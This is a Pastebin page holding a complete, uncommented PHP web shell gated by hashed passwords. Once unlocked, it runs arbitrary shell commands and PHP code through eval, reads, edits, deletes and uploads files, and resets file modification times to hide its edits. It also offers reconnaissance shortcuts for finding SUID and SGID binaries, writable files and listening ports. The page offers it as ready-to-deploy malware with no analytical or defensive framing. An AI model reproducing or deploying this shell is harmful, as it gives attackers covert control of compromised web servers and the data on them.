This week only. Pastebin PRO Accounts Christmas Special! Don't miss out!Want more features on Pastebin? Sign Up, it's FREE!
Guest

Untitled

By: a guest on Nov 21st, 2010  |  syntax: PHP  |  size: 9.70 KB  |  views: 122  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2. clearstatcache ();
  3. set_magic_quotes_runtime ( 0 );
  4. if (! function_exists ( 'ini_set' )) {
  5.         function ini_set() {
  6.                 return FALSE;
  7.         }
  8. }
  9. ini_set ( 'output_buffering', 0 );
  10. if (@set_time_limit ( 0 ) || ini_set ( 'max_execution_time', 0 ))
  11.         $limit = 'not limited';
  12. else
  13.         $limit = get_cfg_var ( 'max_execution_time' );
  14. if (isset ( $HTTP_SERVER_VARS ) && ! isset ( $_SERVER )) {
  15.         $_POST = &$HTTP_POST_VARS;
  16.         $_GET = &$HTTP_GET_VARS;
  17.         $_SERVER = &$HTTP_SERVER_VARS;
  18. }
  19. if (@get_magic_quotes_gpc ()) {
  20.         foreach ( $_POST as $k => $v )
  21.                 $_POST [$k] = stripslashes ( $v );
  22.         foreach ( $_SERVER as $k => $v )
  23.                 $_SERVER [$k] = stripslashes ( $v );
  24. }
  25. if (! isset ( $_GET ['z'] ) || md5 ( $_GET ['z'] ) !== '95e1ebd665d6df61319c938b954f913c')
  26.         die ();
  27. function execute($c) {
  28.         if (function_exists ( 'exec' )) {
  29.                 @exec ( $c, $out );
  30.                 return @implode ( "\n", $out );
  31.         } elseif (function_exists ( 'shell_exec' )) {
  32.                 $out = @shell_exec ( $c );
  33.                 return $out;
  34.         } elseif (function_exists ( 'system' )) {
  35.                 @ob_start ();
  36.                 @system ( $c, $ret );
  37.                 $out = @ob_get_contents ();
  38.                 @ob_end_clean ();
  39.                 return $out;
  40.         } elseif (function_exists ( 'passthru' )) {
  41.                 @ob_start ();
  42.                 @passthru ( $c, $ret );
  43.                 $out = @ob_get_contents ();
  44.                 @ob_end_clean ();
  45.                 return $out;
  46.         } else {
  47.                 return FALSE;
  48.         }
  49. }
  50. function read($f) {
  51.         $str = @file ( $f );
  52.         if ($str) {
  53.                 $out = implode ( '', $str );
  54.         } elseif (function_exists ( 'curl_version' )) {
  55.                 @ob_start ();
  56.                 $h = @curl_init ( 'file:/' . '/' . $f );
  57.                 @curl_exec ( $h );
  58.                 $out = @ob_get_contents ();
  59.                 @ob_end_clean ();
  60.         } else {
  61.                 $out = 'Could not read file!';
  62.         }
  63.         return htmlspecialchars ( $out );
  64. }
  65. function write($f, $c) {
  66.         $t = filemtime ( $f );
  67.         $fp = @fopen ( $f, 'w' );
  68.         if ($fp) {
  69.                 fwrite ( $fp, $c );
  70.                 fclose ( $fp );
  71.                 $out = 'File saved.' . "\n";
  72.                 if ($t && touch ( $f, $t )) {
  73.                         $out .= 'Last modification
  74. time changed.';
  75.                 } else {
  76.                         $out .= 'Could not change last modification
  77. time!';
  78.                 }
  79.         } else {
  80.                 $out = 'Saving failed!';
  81.         }
  82.         return $out;
  83. }
  84. function file_size($f) {
  85.         $size = filesize ( $f );
  86.         if ($size < 1024)
  87.                 $size = $size . '&nbsp;b';
  88.         elseif ($size < 1048576)
  89.                 $size = round ( $size / 1024 * 100 ) / 100 . '&nbsp;Kb';
  90.         elseif ($size < 1073741824)
  91.                 $size = round ( $size / 1048576 * 100 ) / 100 . '&nbsp;Mb';
  92.         return $size;
  93. }
  94. $zzz = $_POST ['zzz'];
  95. if (! function_exists ( 'natcasesort' )) {
  96.         function natcasesort($arr) {
  97.                 return sort ( $arr );
  98.         }
  99. }
  100. if (! empty ( $_POST ['dir'] )) {
  101.         $dir = $_POST ['dir'];
  102.         if (! @chdir ( $dir ))
  103.                 $out = 'chdir() failled!';
  104. }
  105. $dir = getcwd ();
  106. (strlen ( $dir ) > 1 && $dir [1] == ':') ? $os_type = 'win' : $os_type = 'nix';
  107. if (! $os_name = @php_uname ()) {
  108.         if (function_exists ( 'posix_uname' )) {
  109.                 $os_name = posix_uname ();
  110.         } elseif ($os_name != getenv ( 'OS' )) {
  111.                 $os_name = '';
  112.         }
  113. }
  114.  
  115. if (function_exists ( 'posix_getpwuid' )) {
  116.         $data = posix_getpwuid ( posix_getuid () );
  117.         $user = $data ['name'] . '
  118. uid(' . $data ['uid'] . ') gid(' . $data ['gid'] . ')';
  119. } else {
  120.         $user = '';
  121. }
  122.  
  123. $safe_mode = get_cfg_var ( 'safe_mode' );
  124. $safe_mode ? $safe = 'on' : $safe = 'off';
  125. execute ( 'echo ssps' ) ? $execute = 'on' : $execute = 'off';
  126.  
  127. $server = getenv ( 'SERVER_SOFTWARE' );
  128. if (! $server)
  129.         $server = '---';
  130. $out = '';
  131. $tail = '';
  132. $aliases = '';
  133. if (! $safe_mode) {
  134.         if ($os_type == 'nix') {
  135.                 $os .= execute ( 'sysctl -n kern.ostype' );
  136.                 $os .= execute ( 'sysctl -n
  137. kern.osrelease' );
  138.                 $os .= execute ( 'sysctl -n kernel.ostype' );
  139.                 $os .= execute ( 'sysctl -n kernel.osrelease' );
  140.                 if (empty ( $user ))
  141.                         $user = execute ( 'id' );
  142.                 $aliases = array ('' => '', 'find suid files' => 'find /
  143. -type f -perm -04000 -ls', 'find sgid files' => 'find / -type f -perm
  144. -02000 -ls', 'find all writable files in current dir' => 'find . -type f
  145. -perm -2 -ls', 'find all writable directories in current dir' => 'find .
  146. -type d -perm -2 -ls', 'find all writable directories and files in
  147. current dir' => 'find . -perm -2 -ls', 'show opened ports' => 'netstat -an |
  148. grep -i listen' );
  149.         } else {
  150.                 $os_name .= execute ( 'ver' );
  151.                 $user .= execute ( 'echo %username%' );
  152.                 $aliases = array ('' => '', 'show runing
  153. services' => 'net start', 'show process list' => 'tasklist' );
  154.         }
  155. }
  156.  
  157. print <<<here
  158.         <style>
  159. table {font:9pt Tahoma;border-color:white}
  160. input,select,file {background-color:#eeeeee}
  161. textarea {background-color:#f2f2f2}
  162. </style>
  163.         <br>
  164. <center>
  165. <table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver>
  166. <tr>
  167. <td>
  168. <form method=post>
  169. <table cellpadding=1 cellspacing=0 border=1 width=650>
  170. here;
  171.  
  172. if (empty ( $zzz ) || md5 ( $zzz ) !== 'a841b9908eac74475729ae0be846d1b6') {
  173.         print <<<here
  174. <tr>
  175. <td align=center>
  176. <input type=text name=zzz size=16 value="{$zzz}">
  177. </td>
  178. </tr>
  179. </table>
  180. here;
  181.         die ();
  182. }
  183.  
  184. if (! empty ( $_POST ['cmd'] )) {
  185.         $out = execute ( $_POST ['cmd'] );
  186. }
  187.  
  188. elseif (! empty ( $_POST ['php'] )) {
  189.         ob_start ();
  190.         eval ( $_POST ['php'] );
  191.         $out = ob_get_contents ();
  192.         ob_end_clean ();
  193. }
  194.  
  195. elseif (! empty ( $_POST ['edit'] )) {
  196.         $file = $_POST ['edit'];
  197.         $out = read ( $file );
  198.         $tail = '<input type=hidden name=dir value="' . $dir . '"><input type=hidden name=efile value="' . $file . '"><br><input type=submit>';
  199. }
  200.  
  201. elseif (! empty ( $_POST ['save'] )) {
  202.         $out = write ( $_POST ['efile'], $_POST ['save'] );
  203. }
  204.  
  205. elseif (! empty ( $_POST ['remove'] )) {
  206.         $obj = $_POST ['remove'];
  207.         @is_dir ( $obj ) ? $res = @rmdir ( $obj ) : $res = @unlink ( $obj );
  208.         $res ? $out = 'Removed successfully' : $out = 'Removing failed!';
  209. }
  210.  
  211. elseif (! empty ( $_POST ['newdir'] )) {
  212.         @mkdir ( $_POST ['newdir'] ) ? $out = 'Directory created.' : $out = 'Could not create directory!';
  213. }
  214.  
  215. elseif (! empty ( $_POST ['newfile'] )) {
  216.         @touch ( $_POST ['newfile'] ) ? $out = 'File created.' : $out = 'Could not create file!';
  217. }
  218.  
  219. elseif (! empty ( $_POST ['alias'] )) {
  220.         $out = execute ( $_POST ['alias'] );
  221. }
  222.  
  223. elseif (! empty ( $_FILES ['ufile'] ['tmp_name'] )) {
  224.         if (! is_uploaded_file ( $_FILES ['ufile'] ['tmp_name'] ) || @! copy ( $_FILES ['ufile'] ['tmp_name'], $dir . chr ( 47 ) . $_FILES ['ufile'] ['name'] ))
  225.                 $out = 'Could not upload file';
  226.         else
  227.                 $out = 'Uploaded successfully.';
  228. }
  229.  
  230. if (! $safe_mode)
  231.         print <<<here
  232. <tr>
  233. <td>
  234. cmd
  235. </td>
  236. <td colspan=8 nowrap>
  237. <input type=text name=cmd size=97>
  238. <input type=hidden name=zzz value="{$zzz}">
  239. </td>
  240. </tr>
  241. here;
  242. print <<<here
  243. <tr>
  244. <td>
  245. php
  246. </td>
  247. <td colspan=8>
  248. <input type=text name=php size=97>
  249. </td>
  250. </tr>
  251. <tr>
  252. <td>
  253. actions
  254. </td>
  255. <td>
  256. edit
  257. </td>
  258. <td>
  259. <input type=text name=edit size=14>
  260. </td>
  261. <td>
  262. remove
  263. </td>
  264. <td>
  265. <input type=text name=remove size=14>
  266. </td>
  267. <td>
  268. new_dir
  269. </td>
  270. <td>
  271. <input type=text name=newdir size=14>
  272. </td>
  273. <td>
  274. new_file
  275. </td>
  276. <td>
  277. <input type=text name=newfile size=15>
  278. </td>
  279. </tr>
  280. here;
  281. if ($aliases) {
  282.         print <<<here
  283. <tr>
  284. <td>
  285. aliases
  286. </td>
  287. <td colspan=8>
  288. <select name=alias>
  289. here;
  290.         foreach ( $aliases as $k => $v ) {
  291.                 print '<option value="' . $v . '">' . $k . '</option>';
  292.         }
  293.         print <<<here
  294.  
  295. </select>
  296. <input type=submit>
  297. </td>
  298. </tr>
  299. here;
  300. }
  301. print <<<here
  302. <tr>
  303. <td>
  304. dir
  305. </td>
  306. <td colspan=8>
  307. <input type=text value="{$dir}" name=dir size=97>
  308. </td>
  309. </tr>
  310. </form>
  311.  
  312. <form method=post enctype=multipart/form-data>
  313. <tr>
  314. <td>
  315. upload
  316. </td>
  317. <td colspan=8>
  318. <input type=file name=ufile size=60>&nbsp;&nbsp;<input type=submit value="Upload">
  319. <input type=hidden name=dir value="{$dir}">
  320. <input type=hidden name=zzz value="{$zzz}">
  321. </td>
  322. </tr>
  323. </form>
  324. </table>
  325.  
  326. <table cellpadding=0 cellspacing=0 border=1 width=650>
  327. <form method=post>
  328. <tr valign=top>
  329. <td width=70% bgcolor=#dddddd>
  330. <b>OS:</b> {$os_name}<br>
  331. <b>User:</b> {$user}<br>
  332. <b>Server:</b> {$server}<br>
  333. <b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit}
  334. <input type=hidden name=zzz value="{$zzz}">
  335. </td>
  336. <td rowspan=2 bgcolor=#dddddd>
  337. here;
  338.  
  339. if ($dp = @openDir ( $dir )) {
  340.         $cObj = readDir ( $dp );
  341.         while ( $cObj ) {
  342.                 if (@is_dir ( $cObj ))
  343.                         $theDirs [] = $cObj;
  344.                 elseif (@is_file ( $cObj ))
  345.                         $theFiles [] = $cObj;
  346.                 $cObj = readDir ( $dp );
  347.         }
  348.         closedir ( $dp );
  349. }
  350.  
  351. if (! empty ( $theDirs )) {
  352.         natcasesort ( $theDirs );
  353.         if ($os_type == 'nix') {
  354.                 foreach ( $theDirs as $cDir ) {
  355.                         $color = 'black';
  356.                         if (is_writeable ( $cDir )) {
  357.                                 $color = 'red';
  358.                         } elseif (is_readable ( $cDir )) {
  359.                                 $color = 'blue';
  360.                         }
  361.                         print "<font color=" . $color . ">&lt;" . $cDir . "&gt;</font><br>";
  362.                 }
  363.         } else {
  364.                 foreach ( $theDirs as $cDir ) {
  365.                         $tmp = $cDir . '/.ssps_tmp';
  366.                         if (@touch ( $tmp )) {
  367.                                 $color = 'red';
  368.                                 unlink ( $tmp );
  369.                         } elseif (opendir ( $cDir )) {
  370.                                 closedir ();
  371.                                 $color = 'blue';
  372.                         } else {
  373.                                 $color = 'black';
  374.                         }
  375.                         print "<font color=" . $color . ">&lt;" . $cDir . "&gt;</font><br>";
  376.                 }
  377.         }
  378. } else
  379.         print '<br>open_basedir restriction in effect. Allowed path is ' . get_cfg_var ( 'open_basedir' );
  380.  
  381. print '<br>';
  382.  
  383. if (! empty ( $theFiles )) {
  384.         natcasesort ( $theFiles );
  385.         print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">';
  386.         foreach ( $theFiles as $cFile ) {
  387.                 $size = file_size ( $cFile );
  388.                 if ($fp = @fopen ( $cFile, 'a' ))
  389.                         $color = 'red';
  390.                 elseif ($fp = @fopen ( $cFile, 'r' ))
  391.                         $color = 'blue';
  392.                 else
  393.                         $color = 'black';
  394.                 @fclose ( $fp );
  395.                 print '<tr><td width=100%><font color=' . $color . '>' . $cFile . '</font></td><td align=left>' . $size . '</tr>';
  396.         }
  397.         print '</table>';
  398. }
  399.  
  400. print <<<here
  401. </td>
  402. </tr>
  403. ?>
  404. <tr valign=top>
  405. <td align=center>
  406. <form method=post>
  407. results:
  408. <textarea name=save cols=55 rows=15>{$out}</textarea>
  409. {$tail}
  410. <input type=hidden name=zzz value="{$zzz}">
  411. </form>
  412. </td>
  413. </tr>
  414.  
  415. </table>
  416. </form>
  417. </td>
  418. </tr>
  419. </table>
  420. here;
  421. die ();
clone this paste RAW Paste Data